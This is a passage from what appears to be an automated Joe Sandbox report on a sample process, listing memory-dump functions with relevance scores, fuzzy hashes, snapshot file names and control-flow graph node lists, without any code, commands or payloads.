                                                  • Opcode Fuzzy Hash: 44b5f956f36fc27b896df11f103fcfe776700f3e167aa5261e296d7d8f162834
                                                  • Instruction Fuzzy Hash: B072E074E04229CFDB64DF69C884BEDBBB2BB99300F1485EAD409A7295D7709E81CF50
                                                  Function 008B39A0 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907149405.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8b0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 89b7ae0ba7093de30043976c5cb7b3448c05731cef526870ff68ff16ca989625
                                                  • Instruction ID: a57ad0b9a3b9388ffa247378689eaab558abbfb919f1cc16bd3efc4a92f6c9eb
                                                  • Opcode Fuzzy Hash: 89b7ae0ba7093de30043976c5cb7b3448c05731cef526870ff68ff16ca989625
                                                  • Instruction Fuzzy Hash: DAD19F74E002188FDB54DFA5C994B9DBBB2FF89300F6481AAD409AB354DB359E81CF51
                                                  Function 00718748 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3166 718748-718768 3167 71876a 3166->3167 3168 71876f-718800 3166->3168 3167->3168 3172 718bc0-718bf2 3168->3172 3173 718806-71881c 3168->3173 3224 71881f call 1c94a8 3173->3224 3225 71881f call 1c97ea 3173->3225 3176 718824-718836 3226 718838 call 1cdec8 3176->3226 3227 718838 call 1cdeb9 3176->3227 3228 718838 call 1ce2ab 3176->3228 3177 71883d-718858 3179 71885a 3177->3179 3180 71885f-718868 3177->3180 3179->3180 3181 718bb3-718bb9 3180->3181 3182 71886d-71892b 3181->3182 3183 718bbf 3181->3183 3190 718931-71899f 3182->3190 3191 7189e7-718a41 3182->3191 3183->3172 3200 7189a1-7189e1 3190->3200 3201 7189e2-7189e5 3190->3201 3202 718a42-718ab5 3191->3202 3200->3201 3201->3202 3209 718abb-718b9d 3202->3209 3210 718b9e-718ba9 3202->3210 3209->3210 3211 718bb0 3210->3211 3212 718bab 3210->3212 3211->3181 3212->3211 3224->3176 3225->3176 3226->3177 3227->3177 3228->3177
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 638b25f7f5e6a78a404c528ffb29a0b860d80401a43aab0c19dd187b9207fc66
                                                  • Instruction ID: 069ebd01874726795e91745bdff014d7e2f40515f90e6239cd13cf1f8e5a732b
                                                  • Opcode Fuzzy Hash: 638b25f7f5e6a78a404c528ffb29a0b860d80401a43aab0c19dd187b9207fc66
                                                  • Instruction Fuzzy Hash: 98D1A074E002188FDB54DFA5C994B9DBBB2FF89300F6081AAD409AB394DB359E81CF51
                                                  Function 00719F30 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f2e7479fb74b1b809bc5b20a1a95e77dd01f30a33fd73c34e80f94d5b6260df
                                                  • Instruction ID: 9c05a5dbb5f1190e7604ec28e68c78282e882e6fd193c911e4dabe53b0c39e44
                                                  • Opcode Fuzzy Hash: 6f2e7479fb74b1b809bc5b20a1a95e77dd01f30a33fd73c34e80f94d5b6260df
                                                  • Instruction Fuzzy Hash: 5FD19E74E012188FDB54DFA5C994B9DBBB2FF89300F6081AAD409AB394DB359E81CF51
                                                  Function 00944318 Relevance: .2, Instructions: 220COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f4a252338c5349b6e167d7d495cdf8f2718af15c4c60f5c3cf3a1c2ee540d42
                                                  • Instruction ID: 90005cc178d76fd8235b4d03e1cbfb84cd9833da013489b797c0a310ea9bec14
                                                  • Opcode Fuzzy Hash: 6f4a252338c5349b6e167d7d495cdf8f2718af15c4c60f5c3cf3a1c2ee540d42
                                                  • Instruction Fuzzy Hash: EDA19275E012298FEB68CF6AD944B9DFBF2AF89300F14C1AAD408A7250DB745A85CF51
                                                  Function 00943C38 Relevance: .2, Instructions: 220COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1922ac541566bf2537ed6c189a5169c0e8bfbc9744d76f2589696cce8bf4c2a5
                                                  • Instruction ID: 69c0bbfefa739e57948af87acc423d533a8b52f8bc3a81b4963cdbc0da961243
                                                  • Opcode Fuzzy Hash: 1922ac541566bf2537ed6c189a5169c0e8bfbc9744d76f2589696cce8bf4c2a5
                                                  • Instruction Fuzzy Hash: C8A19475E012298FEB68CF6AC944B9DFBF2AF89300F14C1AAD408A7250DB745A85CF51
                                                  Function 009450D8 Relevance: .2, Instructions: 220COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 93b4da6243c0a30d10c5c51eeedf5dff5d8b871e506bef7b5b72fde9a68f5656
                                                  • Instruction ID: ad13edc832d591317c126420405e1f61ba47889a717fb6abdac507c95abd808a
                                                  • Opcode Fuzzy Hash: 93b4da6243c0a30d10c5c51eeedf5dff5d8b871e506bef7b5b72fde9a68f5656
                                                  • Instruction Fuzzy Hash: FDA1B374E01629CFEB68CF6AC944B9DBBF2BF89300F14C1AAD408A7255DB745A85CF50
                                                  Function 009449F8 Relevance: .2, Instructions: 220COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eddb71193dba06e2abd9c9cb08ad1a5aea648c541b472e5eccb184003c9075c2
                                                  • Instruction ID: f0b7003ab1091fa9b08848edca329a6d441b042f67540060d86ccababa2dd50d
                                                  • Opcode Fuzzy Hash: eddb71193dba06e2abd9c9cb08ad1a5aea648c541b472e5eccb184003c9075c2
                                                  • Instruction Fuzzy Hash: 96A19575E01229CFEB68CF6AC984BDDFBF2AB89300F14C1A9D408A7250DB745A85CF51
                                                  Function 00942E78 Relevance: .2, Instructions: 220COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e35057b917be41f9543261a85fe8ebca9d09f6378b7e869bdd354314bdbf540e
                                                  • Instruction ID: 9d25c064e423465527d83a4b6069786d9f43908e990e2b83dc2b8bc1b1444552
                                                  • Opcode Fuzzy Hash: e35057b917be41f9543261a85fe8ebca9d09f6378b7e869bdd354314bdbf540e
                                                  • Instruction Fuzzy Hash: BFA1A174E012298FEB68CF6AC944B9DBBF2BF89300F14C5AAD408A7250DB745A85CF51
                                                  Function 001C94A8 Relevance: .2, Instructions: 220COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ceaec3eacd7ffa643b4873d97af3ebdd8f53da6231961ab1517230d4e8e5ca9f
                                                  • Instruction ID: dd1624863cf96a8a393dae54d4ed5deb6bc12e38ed9c359e9f4722fa415726c2
                                                  • Opcode Fuzzy Hash: ceaec3eacd7ffa643b4873d97af3ebdd8f53da6231961ab1517230d4e8e5ca9f
                                                  • Instruction Fuzzy Hash: CBA12670E00218CFEB14DFA9C988BDDBBB1BF89314F208669E408B7291DB749985CF55
                                                  Function 009457B8 Relevance: .2, Instructions: 219COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7c1b99237622d903476c4732f834e63b5b969121912d13a08fe15b607ba723d7
                                                  • Instruction ID: a43f652f1f8371aa91bee83a9f7c1d60e2b6acafacfdcaa44becfac0b6f67aa4
                                                  • Opcode Fuzzy Hash: 7c1b99237622d903476c4732f834e63b5b969121912d13a08fe15b607ba723d7
                                                  • Instruction Fuzzy Hash: FFA1A470E01629CFEB68CF6AC944B9DFBF2AF89300F14C1AAD408A7251DB745A85CF50
                                                  Function 00943558 Relevance: .2, Instructions: 219COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b297df168cda2e91975607a13a0f5d366af3310c550e0fca3ee047eb5dcd2699
                                                  • Instruction ID: 268264fcb3d001927a18625181653c6409cf72f8b9011cecd37664b083e18acb
                                                  • Opcode Fuzzy Hash: b297df168cda2e91975607a13a0f5d366af3310c550e0fca3ee047eb5dcd2699
                                                  • Instruction Fuzzy Hash: 24A195B5E012298FEB68CF6AC944B9DFBF2AF89300F14C1A9D448A7250DB745A85CF51
                                                  Function 001C97EA Relevance: .2, Instructions: 202COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 76c67b4601ffd1c878fa28eea2134dacb7b3a1b809f261a27604acb8e376737e
                                                  • Instruction ID: bf95e16f92f7d903b4dcace89d044c5cf386fd19d1f66ec3c5563e8820858e42
                                                  • Opcode Fuzzy Hash: 76c67b4601ffd1c878fa28eea2134dacb7b3a1b809f261a27604acb8e376737e
                                                  • Instruction Fuzzy Hash: 9B910470D00218CFEB10DFA8C888BDDBBB1BF59314F2486A9E009AB291DB759985CF55
                                                  Function 008BA5E8 Relevance: .2, Instructions: 200COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907149405.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8b0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5d3e138e0f8ea128537ed8295745c637eb035504e4ae4d69bfb7226d22e70b9b
                                                  • Instruction ID: 3151f13d0507cb77fdefb6a5cce8320a57120382310a50f1d345c2500f3cd723
                                                  • Opcode Fuzzy Hash: 5d3e138e0f8ea128537ed8295745c637eb035504e4ae4d69bfb7226d22e70b9b
                                                  • Instruction Fuzzy Hash: 8981B174E00218CFDB18DFA9D890BADBBB2FB89300F648169D405BB358EB355946CF55
                                                  Function 009457A8 Relevance: .2, Instructions: 167COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 314d9d8ce4af7ee4c07d174534cd6c1fef7858f2282a5967886d4f8d4d7fc0ce
                                                  • Instruction ID: 91c20167b82421167d20320f0b7b972416a1444520d8d27a63c07eccc35d098a
                                                  • Opcode Fuzzy Hash: 314d9d8ce4af7ee4c07d174534cd6c1fef7858f2282a5967886d4f8d4d7fc0ce
                                                  • Instruction Fuzzy Hash: B7719471E01629CFEB68CF6AC944B9EBAF2BF89300F14C1A9D448A7254DB745A85CF50
                                                  Function 0094354B Relevance: .2, Instructions: 162COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 710217befdd6d4e3633ab5b16d80ff6a1da8fc15e545509d87b5dd00bcaffd0d
                                                  • Instruction ID: 0c7915447b9aae748c6ac52552fec895549a329d18fc996524701f4c4bc66799
                                                  • Opcode Fuzzy Hash: 710217befdd6d4e3633ab5b16d80ff6a1da8fc15e545509d87b5dd00bcaffd0d
                                                  • Instruction Fuzzy Hash: 7471B5B1E016298FEB68CF66C954B9DFAF2BF89300F14C1EAD408A7254DB745A85CF50
                                                  Function 00944308 Relevance: .1, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6738a76ae8d3b07fad8e6a2275a7f049dd0c7437f6f48da9a82d372bcfd5a8c0
                                                  • Instruction ID: e78e18afce4bd605f5ef353feeac81eb4583b2c19c65f6afb41ab85a88024b3b
                                                  • Opcode Fuzzy Hash: 6738a76ae8d3b07fad8e6a2275a7f049dd0c7437f6f48da9a82d372bcfd5a8c0
                                                  • Instruction Fuzzy Hash: B6416A71E016188BEB58CF5BD95479EFAF3AFC9300F14C1AAD50CA7264EB740A858F51
                                                  Function 00943C28 Relevance: .1, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 85e59642e186f8f10d213d6790aeef816b75533dd37545b7f63d34c22fad0b67
                                                  • Instruction ID: f8698bd02b22b95db575e47969013e0d736d5d4d3a09ad810f3ce238233dd920
                                                  • Opcode Fuzzy Hash: 85e59642e186f8f10d213d6790aeef816b75533dd37545b7f63d34c22fad0b67
                                                  • Instruction Fuzzy Hash: BF417A71E016188FEB58CF6BC95479EFAF3AFC9300F14C1AAD40CAA254EB741A858F51
                                                  Function 00942E68 Relevance: .1, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08866910c3f476932b6d21a8479a470ef3bd232437da427ab269762b8830b037
                                                  • Instruction ID: d8eb9cb74d885bd7237a2615b4f466745ab2f322eeca5c10ac86f2c4c072f9a4
                                                  • Opcode Fuzzy Hash: 08866910c3f476932b6d21a8479a470ef3bd232437da427ab269762b8830b037
                                                  • Instruction Fuzzy Hash: CF417771E016188FEB18CF6BC95479EFAF3AFC9300F14C1AAD40CAA254EB741A858F51
                                                  Function 009450C8 Relevance: .1, Instructions: 108COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e2971417b1f8128636deae2783e3fa935b84f4baab1d689d48a83c3d4be9a18
                                                  • Instruction ID: f86b80da84c5931a1beb3c977efc52f0d69e83fe3afa54ca225ee09689d625b5
                                                  • Opcode Fuzzy Hash: 5e2971417b1f8128636deae2783e3fa935b84f4baab1d689d48a83c3d4be9a18
                                                  • Instruction Fuzzy Hash: FF416871D016588FEB68CF6BD85479EFAF3AFC9300F14C1AAD40CA6264EB7409858F51
                                                  Function 009449E9 Relevance: .1, Instructions: 108COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ecd58b3273f6531cc4c033d6eaa6a21c28388e768957d722a859697710562f64
                                                  • Instruction ID: 2813d6e3aa081e33ebf120c9e568b3f2c83d4e5f759c4a3919510e86a90c73fe
                                                  • Opcode Fuzzy Hash: ecd58b3273f6531cc4c033d6eaa6a21c28388e768957d722a859697710562f64
                                                  • Instruction Fuzzy Hash: 47416971E016188FEB68CF6BC95479EFAF3AFC9300F14C1A9D50CA6254EB741A858F51
                                                  Function 00718738 Relevance: .1, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a6b3a83387cf2cc5cba72412e51cdf75699f508f0f36f56fcc786e61a7875e0
                                                  • Instruction ID: 15d0cfad7824e51dc0cb72bc6d0dfcdc38de9eb702496a724808cd3077de603d
                                                  • Opcode Fuzzy Hash: 8a6b3a83387cf2cc5cba72412e51cdf75699f508f0f36f56fcc786e61a7875e0
                                                  • Instruction Fuzzy Hash: 5341AFB0E012188FDB58DFAAD9547DDBBF2BB99300F60C06AD418AB254EB345946CF50
                                                  Function 00719F24 Relevance: .1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bc7563694f2516ae8afda9be9ef37d2aecdc7b88c80aacd038d33b82b1ebc5e6
                                                  • Instruction ID: dc5c52a44ef8fbad8d0c960942f910200fd8e71cd15e2c78bc5dc2c39b6f2b8c
                                                  • Opcode Fuzzy Hash: bc7563694f2516ae8afda9be9ef37d2aecdc7b88c80aacd038d33b82b1ebc5e6
                                                  • Instruction Fuzzy Hash: CE41AF70E012189FDB18DFAAD95469EBBF2BF89300F54D06AD418AB294EB345946CF50
                                                  Function 008B399D Relevance: .1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907149405.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8b0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b1aa867cf32e2fdab15f766ab726975f40fbef7601d5a5674fee06bd4ec43e86
                                                  • Instruction ID: f29528dbda36fa5912bab38a5e1a2bfddab7eb41a95475b439bbeb69af5fe24e
                                                  • Opcode Fuzzy Hash: b1aa867cf32e2fdab15f766ab726975f40fbef7601d5a5674fee06bd4ec43e86
                                                  • Instruction Fuzzy Hash: D741AC74E006188FDB18DFAAD8546DEBBB2BF89300F60D06AD419BB254EB349946CF50
                                                  Function 008D2CEF Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1231 8d2cef-8d2cf6 1232 8d2cf9-8d2d09 1231->1232 1233 8d2c84-8d2c95 1231->1233 1240 8d2d0e-8d2d1b 1232->1240 1237 8d2c9e-8d2c9f 1233->1237 1238 8d2c97 1233->1238 1237->1240 1238->1237 1239 8d2c52-8d2c64 1238->1239 1242 8d2c6d-8d2c6e 1239->1242 1243 8d2c66 1239->1243 1261 8d2d23-8d2d27 1240->1261 1242->1240 1243->1237 1243->1239 1243->1242 1245 8d2c4c-8d2c4d 1243->1245 1246 8d2bc8-8d2bd2 1243->1246 1247 8d2c2a-8d2c4a LdrInitializeThunk 1243->1247 1248 8d2b44-8d2b4b 1243->1248 1249 8d2c01-8d2c19 1243->1249 1250 8d2bd8 1243->1250 1251 8d2c1b-8d2c28 1243->1251 1252 8d2bda-8d2beb 1243->1252 1253 8d2bd5-8d2bd6 1243->1253 1254 8d2b37-8d2b3d 1243->1254 1255 8d2b70-8d2b83 1243->1255 1256 8d2b52-8d2b6b 1243->1256 1245->1261 1246->1253 1247->1245 1248->1256 1249->1247 1249->1251 1257 8d2bd9 1250->1257 1251->1245 1262 8d2bed 1252->1262 1263 8d2bf2 1252->1263 1253->1249 1254->1248 1258 8d2b8a-8d2bc6 1255->1258 1259 8d2b85 1255->1259 1260 8d2bf5-8d2bfb 1256->1260 1257->1252 1258->1246 1258->1257 1259->1258 1260->1249 1260->1255 1264 8d2d2f-8d2d38 1261->1264 1265 8d2d29-8d2d2e 1261->1265 1262->1263 1263->1260 1265->1264
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5709b7f6e871ed3da353e51e2607e0cbf03c21aee32e9abd71d789a0b92be21d
                                                  • Instruction ID: 57f3d96bb0e7f1681024f67d542e870cb713ca858073ba1cc966472494853ffc
                                                  • Opcode Fuzzy Hash: 5709b7f6e871ed3da353e51e2607e0cbf03c21aee32e9abd71d789a0b92be21d
                                                  • Instruction Fuzzy Hash: BE510274D1521CCFDB14CFA9D4846DDBBB2FB69325F20861AE015AB3A4D7749846CF10
                                                  Function 008D2AD8 Relevance: 1.6, APIs: 1, Instructions: 124libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1271 8d2ad8-8d2afd 1272 8d2aff 1271->1272 1273 8d2b04-8d2b6b 1271->1273 1272->1273 1278 8d2bf5-8d2bfb 1273->1278 1279 8d2c01-8d2c19 1278->1279 1280 8d2b70-8d2b83 1278->1280 1281 8d2c1b-8d2c28 1279->1281 1282 8d2c2a-8d2c4a LdrInitializeThunk 1279->1282 1283 8d2b8a-8d2bc6 1280->1283 1284 8d2b85 1280->1284 1285 8d2c4c-8d2d27 1281->1285 1282->1285 1293 8d2bd9-8d2beb 1283->1293 1294 8d2bc8-8d2bd6 1283->1294 1284->1283 1288 8d2d2f-8d2d38 1285->1288 1289 8d2d29-8d2d2e 1285->1289 1289->1288 1297 8d2bed 1293->1297 1298 8d2bf2 1293->1298 1294->1279 1297->1298 1298->1278
                                                  APIs
                                                  • LdrInitializeThunk.NTDLL(000000FF), ref: 008D2C3A
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: c2125bfb630b482a24b42de090270456e5bf26ec10afbce3713b1910c7490a13
                                                  • Instruction ID: b797c7baf39515e6c707230a523c9bf66af405761f0893de896f0dec4ffccf5a
                                                  • Opcode Fuzzy Hash: c2125bfb630b482a24b42de090270456e5bf26ec10afbce3713b1910c7490a13
                                                  • Instruction Fuzzy Hash: 8651D0B0D01218DBDB18CFAAD8886DDBBB2FF99314F20862AE415AB394D7749945CF50
                                                  Function 008D2C73 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1299 8d2c73-8d2c7d 1300 8d2c7f-8d2c87 1299->1300 1301 8d2c89-8d2c8c 1299->1301 1300->1301 1302 8d2c8f-8d2c95 1300->1302 1301->1302 1303 8d2c9e-8d2c9f 1302->1303 1304 8d2c97 1302->1304 1306 8d2d0e-8d2d1b 1303->1306 1304->1303 1305 8d2c52-8d2c64 1304->1305 1307 8d2c6d-8d2c6e 1305->1307 1308 8d2c66 1305->1308 1326 8d2d23-8d2d27 1306->1326 1307->1306 1308->1303 1308->1305 1308->1307 1310 8d2c4c-8d2c4d 1308->1310 1311 8d2bc8-8d2bd2 1308->1311 1312 8d2c2a-8d2c4a LdrInitializeThunk 1308->1312 1313 8d2b44-8d2b4b 1308->1313 1314 8d2c01-8d2c19 1308->1314 1315 8d2bd8 1308->1315 1316 8d2c1b-8d2c28 1308->1316 1317 8d2bda-8d2beb 1308->1317 1318 8d2bd5-8d2bd6 1308->1318 1319 8d2b37-8d2b3d 1308->1319 1320 8d2b70-8d2b83 1308->1320 1321 8d2b52-8d2b6b 1308->1321 1310->1326 1311->1318 1312->1310 1313->1321 1314->1312 1314->1316 1322 8d2bd9 1315->1322 1316->1310 1327 8d2bed 1317->1327 1328 8d2bf2 1317->1328 1318->1314 1319->1313 1323 8d2b8a-8d2bc6 1320->1323 1324 8d2b85 1320->1324 1325 8d2bf5-8d2bfb 1321->1325 1322->1317 1323->1311 1323->1322 1324->1323 1325->1314 1325->1320 1329 8d2d2f-8d2d38 1326->1329 1330 8d2d29-8d2d2e 1326->1330 1327->1328 1328->1325 1330->1329
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e65ce9dcdf4671f8fbe7e31e66791b5fce2768cc54d9b834a942162274a10b37
                                                  • Instruction ID: 46e64511630fc96ae87da8751110389a8e303000689874c36e9abb03b6f27d4d
                                                  • Opcode Fuzzy Hash: e65ce9dcdf4671f8fbe7e31e66791b5fce2768cc54d9b834a942162274a10b37
